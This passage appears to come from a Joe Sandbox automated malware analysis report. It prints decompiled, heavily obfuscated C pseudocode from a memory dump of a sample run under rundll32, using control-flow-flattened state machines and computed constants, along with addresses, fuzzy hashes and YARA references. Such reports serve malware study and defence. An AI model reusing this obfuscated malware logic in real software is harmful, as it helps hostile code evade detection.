				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E002EDA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x2f3e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E002D3BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E002DCB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}































                                                                                                                                  0x002da55f
                                                                                                                                  0x002da565
                                                                                                                                  0x002da56c
                                                                                                                                  0x002da571
                                                                                                                                  0x002da576
                                                                                                                                  0x002da57e
                                                                                                                                  0x002da590
                                                                                                                                  0x002da595
                                                                                                                                  0x002da5a0
                                                                                                                                  0x002da5a3
                                                                                                                                  0x002da5a7
                                                                                                                                  0x002da5af
                                                                                                                                  0x002da5b7
                                                                                                                                  0x002da5bb
                                                                                                                                  0x002da5c0
                                                                                                                                  0x002da5c8
                                                                                                                                  0x002da5d0
                                                                                                                                  0x002da5d8
                                                                                                                                  0x002da5dd
                                                                                                                                  0x002da5e5
                                                                                                                                  0x002da5ed
                                                                                                                                  0x002da5f5
                                                                                                                                  0x002da5fd
                                                                                                                                  0x002da605
                                                                                                                                  0x002da612
                                                                                                                                  0x002da616
                                                                                                                                  0x002da61e
                                                                                                                                  0x002da626
                                                                                                                                  0x002da62e
                                                                                                                                  0x002da63e
                                                                                                                                  0x002da642
                                                                                                                                  0x002da64a
                                                                                                                                  0x002da652
                                                                                                                                  0x002da65a
                                                                                                                                  0x002da662
                                                                                                                                  0x002da66a
                                                                                                                                  0x002da672
                                                                                                                                  0x002da67a
                                                                                                                                  0x002da682
                                                                                                                                  0x002da68a
                                                                                                                                  0x002da692
                                                                                                                                  0x002da69a
                                                                                                                                  0x002da69f
                                                                                                                                  0x002da6a7
                                                                                                                                  0x002da6af
                                                                                                                                  0x002da6b7
                                                                                                                                  0x002da6c0
                                                                                                                                  0x002da6c5
                                                                                                                                  0x002da6c9
                                                                                                                                  0x002da6d1
                                                                                                                                  0x002da6df
                                                                                                                                  0x002da6e4
                                                                                                                                  0x002da6e8
                                                                                                                                  0x002da6f0
                                                                                                                                  0x002da6f8
                                                                                                                                  0x002da706
                                                                                                                                  0x002da70a
                                                                                                                                  0x002da71a
                                                                                                                                  0x002da726
                                                                                                                                  0x002da72f
                                                                                                                                  0x002da73c
                                                                                                                                  0x002da73c
                                                                                                                                  0x002da742
                                                                                                                                  0x002da772
                                                                                                                                  0x002da777
                                                                                                                                  0x002da77a
                                                                                                                                  0x00000000
                                                                                                                                  0x002da77a
                                                                                                                                  0x002da746
                                                                                                                                  0x002da7f0
                                                                                                                                  0x002da7f5
                                                                                                                                  0x00000000
                                                                                                                                  0x002da80f
                                                                                                                                  0x002da752
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da758
                                                                                                                                  0x002da758
                                                                                                                                  0x002da77e
                                                                                                                                  0x002da78f
                                                                                                                                  0x002da793
                                                                                                                                  0x002da79b
                                                                                                                                  0x002da7b3
                                                                                                                                  0x002da7bc
                                                                                                                                  0x002da7bf
                                                                                                                                  0x002da7d3
                                                                                                                                  0x002da7d3
                                                                                                                                  0x002da7d7
                                                                                                                                  0x002da7d9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da7c4
                                                                                                                                  0x002da7c8
                                                                                                                                  0x002da7d0
                                                                                                                                  0x002da7d0
                                                                                                                                  0x002da7d0
                                                                                                                                  0x00000000
                                                                                                                                  0x002da7d0
                                                                                                                                  0x002da7ca
                                                                                                                                  0x002da7ca
                                                                                                                                  0x002da7ca
                                                                                                                                  0x002da7ce
                                                                                                                                  0x002da7dd
                                                                                                                                  0x002da7e0
                                                                                                                                  0x002da7e0
                                                                                                                                  0x00000000
                                                                                                                                  0x002da7e0
                                                                                                                                  0x00000000
                                                                                                                                  0x002da7ce
                                                                                                                                  0x00000000
                                                                                                                                  0x002da7e2
                                                                                                                                  0x002da7e2
                                                                                                                                  0x002da7e2
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: QNiA$sz
                                                                                                                                  • API String ID: 0-294658094
                                                                                                                                  • Opcode ID: 0e8f295be2ae595fc7657dcb850da5c1e175ccdcfe44f612fde8b60dfd5feccf
                                                                                                                                  • Instruction ID: 6b549235e151d4decf83ec7563ac632297b9ab2c0b92d2b657d91c0ff1ed79f4
                                                                                                                                  • Opcode Fuzzy Hash: 0e8f295be2ae595fc7657dcb850da5c1e175ccdcfe44f612fde8b60dfd5feccf
                                                                                                                                  • Instruction Fuzzy Hash: D0715231519341ABD398CF26D98581FFBF1FBC4718F40491EF596A6260D3B48A098F83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E0B19 Relevance: 2.6, Strings: 2, Instructions: 144COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002E0B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x2f3208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E002E8519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E002D8DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E002E9E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E002E1E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}
































                                                                                                                                  0x002e0b19
                                                                                                                                  0x002e0b1c
                                                                                                                                  0x002e0b26
                                                                                                                                  0x002e0b32
                                                                                                                                  0x002e0b3a
                                                                                                                                  0x002e0b3e
                                                                                                                                  0x002e0b40
                                                                                                                                  0x002e0b48
                                                                                                                                  0x002e0b4e
                                                                                                                                  0x002e0b56
                                                                                                                                  0x002e0b5e
                                                                                                                                  0x002e0b66
                                                                                                                                  0x002e0b6e
                                                                                                                                  0x002e0b76
                                                                                                                                  0x002e0b7e
                                                                                                                                  0x002e0b86
                                                                                                                                  0x002e0b8e
                                                                                                                                  0x002e0b96
                                                                                                                                  0x002e0b9e
                                                                                                                                  0x002e0ba2
                                                                                                                                  0x002e0baa
                                                                                                                                  0x002e0bb2
                                                                                                                                  0x002e0bba
                                                                                                                                  0x002e0bc2
                                                                                                                                  0x002e0bca
                                                                                                                                  0x002e0bd8
                                                                                                                                  0x002e0bdd
                                                                                                                                  0x002e0be3
                                                                                                                                  0x002e0be8
                                                                                                                                  0x002e0bf0
                                                                                                                                  0x002e0bf8
                                                                                                                                  0x002e0bfd
                                                                                                                                  0x002e0c02
                                                                                                                                  0x002e0c0a
                                                                                                                                  0x002e0c12
                                                                                                                                  0x002e0c1a
                                                                                                                                  0x002e0c22
                                                                                                                                  0x002e0c2a
                                                                                                                                  0x002e0c32
                                                                                                                                  0x002e0c3e
                                                                                                                                  0x002e0c43
                                                                                                                                  0x002e0c4d
                                                                                                                                  0x002e0c52
                                                                                                                                  0x002e0c58
                                                                                                                                  0x002e0c60
                                                                                                                                  0x002e0c68
                                                                                                                                  0x002e0c74
                                                                                                                                  0x002e0c77
                                                                                                                                  0x002e0c7b
                                                                                                                                  0x002e0c83
                                                                                                                                  0x002e0c8b
                                                                                                                                  0x002e0c93
                                                                                                                                  0x002e0c98
                                                                                                                                  0x002e0ca0
                                                                                                                                  0x002e0ca8
                                                                                                                                  0x002e0cb0
                                                                                                                                  0x002e0cbd
                                                                                                                                  0x002e0cc1
                                                                                                                                  0x002e0cc9
                                                                                                                                  0x002e0cd9
                                                                                                                                  0x002e0cdc
                                                                                                                                  0x002e0ce0
                                                                                                                                  0x002e0ce5
                                                                                                                                  0x002e0ced
                                                                                                                                  0x002e0cf5
                                                                                                                                  0x002e0cfd
                                                                                                                                  0x002e0d05
                                                                                                                                  0x002e0d0d
                                                                                                                                  0x002e0d15
                                                                                                                                  0x002e0d1d
                                                                                                                                  0x002e0d22
                                                                                                                                  0x002e0d9d
                                                                                                                                  0x002e0d9d
                                                                                                                                  0x002e0da1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0d2f
                                                                                                                                  0x002e0d8a
                                                                                                                                  0x002e0d95
                                                                                                                                  0x002e0d97
                                                                                                                                  0x002e0d31
                                                                                                                                  0x002e0d41
                                                                                                                                  0x002e0d45
                                                                                                                                  0x002e0d4a
                                                                                                                                  0x002e0d51
                                                                                                                                  0x002e0dab
                                                                                                                                  0x002e0d53
                                                                                                                                  0x002e0d58
                                                                                                                                  0x002e0d6a
                                                                                                                                  0x002e0d82
                                                                                                                                  0x002e0d87
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0d87
                                                                                                                                  0x002e0d51
                                                                                                                                  0x002e0d2f
                                                                                                                                  0x002e0daa

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 1$
                                                                                                                                  • API String ID: 0-209397207
                                                                                                                                  • Opcode ID: e99963dbd4b7fb98b1d75064bb86f5b5f5052d56add79c6ac94e3a6c514d2108
                                                                                                                                  • Instruction ID: da392522bedf86dc631b4beb273e5faad3b3d887254fa7affd21acca7dae4529
                                                                                                                                  • Opcode Fuzzy Hash: e99963dbd4b7fb98b1d75064bb86f5b5f5052d56add79c6ac94e3a6c514d2108
                                                                                                                                  • Instruction Fuzzy Hash: 35612FB15083419FC394CF22D48940BBBF1FBC9768F509A1DF19A92260D7B1DA5ACF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DAEFB Relevance: 2.6, Strings: 2, Instructions: 141COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002DAEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x2f3dfc; // 0x0
								E002EE274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E002EAE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}



























                                                                                                                                  0x002daeff
                                                                                                                                  0x002daf06
                                                                                                                                  0x002daf0a
                                                                                                                                  0x002daf0c
                                                                                                                                  0x002daf0d
                                                                                                                                  0x002daf11
                                                                                                                                  0x002daf15
                                                                                                                                  0x002daf16
                                                                                                                                  0x002daf17
                                                                                                                                  0x002daf1c
                                                                                                                                  0x002daf24
                                                                                                                                  0x002daf27
                                                                                                                                  0x002daf31
                                                                                                                                  0x002daf39
                                                                                                                                  0x002daf3b
                                                                                                                                  0x002daf43
                                                                                                                                  0x002daf48
                                                                                                                                  0x002daf4d
                                                                                                                                  0x002daf58
                                                                                                                                  0x002daf5d
                                                                                                                                  0x002daf63
                                                                                                                                  0x002daf6b
                                                                                                                                  0x002daf73
                                                                                                                                  0x002daf7d
                                                                                                                                  0x002daf80
                                                                                                                                  0x002daf84
                                                                                                                                  0x002daf8c
                                                                                                                                  0x002daf94
                                                                                                                                  0x002dafa4
                                                                                                                                  0x002dafad
                                                                                                                                  0x002dafb0
                                                                                                                                  0x002dafb4
                                                                                                                                  0x002dafbc
                                                                                                                                  0x002dafc4
                                                                                                                                  0x002dafc9
                                                                                                                                  0x002dafd9
                                                                                                                                  0x002dafdd
                                                                                                                                  0x002dafe5
                                                                                                                                  0x002dafed
                                                                                                                                  0x002daff5
                                                                                                                                  0x002daffe
                                                                                                                                  0x002db001
                                                                                                                                  0x002db005
                                                                                                                                  0x002db00d
                                                                                                                                  0x002db015
                                                                                                                                  0x002db01d
                                                                                                                                  0x002db025
                                                                                                                                  0x002db02d
                                                                                                                                  0x002db035
                                                                                                                                  0x002db03a
                                                                                                                                  0x002db042
                                                                                                                                  0x002db04a
                                                                                                                                  0x002db054
                                                                                                                                  0x002db058
                                                                                                                                  0x002db060
                                                                                                                                  0x002db06d
                                                                                                                                  0x002db071
                                                                                                                                  0x002db076
                                                                                                                                  0x002db083
                                                                                                                                  0x002db08b
                                                                                                                                  0x002db093
                                                                                                                                  0x002db09b
                                                                                                                                  0x002db09b
                                                                                                                                  0x002db0a5
                                                                                                                                  0x002db101
                                                                                                                                  0x00000000
                                                                                                                                  0x002db0a7
                                                                                                                                  0x002db0ad
                                                                                                                                  0x00000000
                                                                                                                                  0x002db0b3
                                                                                                                                  0x002db0bc
                                                                                                                                  0x002db0e3
                                                                                                                                  0x002db0f4
                                                                                                                                  0x002db0f4
                                                                                                                                  0x002db0ad
                                                                                                                                  0x002db0f8
                                                                                                                                  0x002db100
                                                                                                                                  0x002db100
                                                                                                                                  0x002db105
                                                                                                                                  0x002db11b
                                                                                                                                  0x002db120
                                                                                                                                  0x002db125
                                                                                                                                  0x002db131
                                                                                                                                  0x00000000
                                                                                                                                  0x002db127
                                                                                                                                  0x002db127
                                                                                                                                  0x00000000
                                                                                                                                  0x002db127
                                                                                                                                  0x00000000
                                                                                                                                  0x002db136
                                                                                                                                  0x002db136
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #@Z$_`
                                                                                                                                  • API String ID: 0-2586238014
                                                                                                                                  • Opcode ID: 51228a1b975fa769e0ceadba2942e3e08d5494dea2a1bb14eaff08e762942ecf
                                                                                                                                  • Instruction ID: 96a6bb9cd180838338f01f060781a2debc7fba6d5a5144189b9820c269b255e9
                                                                                                                                  • Opcode Fuzzy Hash: 51228a1b975fa769e0ceadba2942e3e08d5494dea2a1bb14eaff08e762942ecf
                                                                                                                                  • Instruction Fuzzy Hash: B75125711083409FC718CF22C88A81BBBE1FBD8758F549A1DF59696260C3B2CA59CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DDFF3 Relevance: 2.6, Strings: 2, Instructions: 135COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DDFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x2f3e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E002D46BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E002D81B7, _v28);
							_t135 =  *0x2f3e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E002D7AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x2f3e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E002D7FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x2f3e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}
























                                                                                                                                  0x002ddff3
                                                                                                                                  0x002ddff6
                                                                                                                                  0x002de000
                                                                                                                                  0x002de008
                                                                                                                                  0x002de010
                                                                                                                                  0x002de018
                                                                                                                                  0x002de020
                                                                                                                                  0x002de028
                                                                                                                                  0x002de030
                                                                                                                                  0x002de038
                                                                                                                                  0x002de049
                                                                                                                                  0x002de052
                                                                                                                                  0x002de05a
                                                                                                                                  0x002de05c
                                                                                                                                  0x002de069
                                                                                                                                  0x002de076
                                                                                                                                  0x002de07b
                                                                                                                                  0x002de083
                                                                                                                                  0x002de092
                                                                                                                                  0x002de095
                                                                                                                                  0x002de099
                                                                                                                                  0x002de0a1
                                                                                                                                  0x002de0a9
                                                                                                                                  0x002de0b1
                                                                                                                                  0x002de0b9
                                                                                                                                  0x002de0c1
                                                                                                                                  0x002de0d1
                                                                                                                                  0x002de0d5
                                                                                                                                  0x002de0da
                                                                                                                                  0x002de0e2
                                                                                                                                  0x002de0ea
                                                                                                                                  0x002de0f6
                                                                                                                                  0x002de0f9
                                                                                                                                  0x002de0fd
                                                                                                                                  0x002de105
